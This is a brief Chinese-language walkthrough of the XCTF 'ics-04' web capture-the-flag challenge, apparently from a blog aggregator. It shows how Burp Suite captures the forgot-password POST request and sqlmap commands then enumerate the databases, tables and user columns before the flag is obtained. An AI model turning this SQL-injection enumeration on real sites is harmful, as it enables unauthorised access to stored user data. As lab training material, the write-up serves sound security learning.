【XCTF 攻防世界】WEB 高手进阶区 ics-04

打开链接是一个网页,只有右上角的注册和登录可以打开
【XCTF 攻防世界】WEB 高手进阶区 ics-04
【XCTF 攻防世界】WEB 高手进阶区 ics-04
这里登陆一下 使用sqlmap发现没有sql注入漏洞

下面还有一个忘记密码,点进去看一看

直接用sqlmap跑同样跑不出来结果

这是想到会不会是post方式注入漏洞

我们用bp获取一下发送的数据【XCTF 攻防世界】WEB 高手进阶区 ics-04
然后再用sqlmap
sqlmap.py -r head.txt --dbs
【XCTF 攻防世界】WEB 高手进阶区 ics-04
获取表名
python sqlmap.py -r head.txt -D cetc004 --tables
获取列名
python sqlmap.py -r head.txt -D cetc004 -T user --columns
【XCTF 攻防世界】WEB 高手进阶区 ics-04
用这个账号再去注册
随便输入信息
然后登陆
即可获得flag【XCTF 攻防世界】WEB 高手进阶区 ics-04

相关文章:

  • 2021-08-16
  • 2021-11-01
  • 2021-11-30
  • 2021-11-14
  • 2021-11-14
  • 2021-06-01
  • 2021-12-23
  • 2021-12-03
猜你喜欢
  • 2021-09-22
  • 2021-11-29
  • 2021-06-24
  • 2021-10-18
  • 2021-07-26
  • 2021-12-21
  • 2021-09-23
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode